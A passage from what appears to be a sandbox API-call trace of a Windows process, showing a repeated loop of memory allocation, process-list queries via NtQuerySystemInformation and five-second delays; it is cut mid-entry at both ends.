returned 0x0 [0282.533] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.534] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.539] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.540] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.541] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.542] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.542] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.543] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.543] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.547] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.547] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.549] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.549] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.550] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.550] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.551] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.555] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.556] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.558] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.558] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.559] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.560] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.560] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.564] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.565] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.566] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.567] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.568] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.568] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.568] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.572] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.572] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.574] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.574] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.575] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.575] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.575] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.579] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.581] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.582] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.583] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.583] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.584] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.584] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.588] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.589] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.590] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.590] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.591] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.591] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.592] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.595] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.596] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.598] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.598] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.599] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.600] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.600] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.604] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.605] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.606] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.607] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.607] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.607] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.608] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.611] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.612] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.613] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.614] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.614] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.614] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.615] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.620] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.620] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.622] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.622] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.623] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.624] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.624] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.629] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.629] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.631] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.631] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.632] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.632] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.632] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.638] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.639] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.640] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.641] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.641] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.642] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.642] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.646] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.647] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.649] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.649] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.650] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.650] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.650] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.654] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.655] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.657] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.657] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.658] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.658] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.658] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.662] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.662] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.664] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.664] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.665] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.665] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.665] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.669] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.670] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.672] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.672] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.673] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.673] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.673] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.677] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.678] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.679] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.680] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.680] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.680] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.681] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.685] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.685] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.687] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.687] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.688] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.688] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.688] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.692] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.693] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.694] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.695] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.695] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.696] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.696] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.700] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.700] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.702] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, 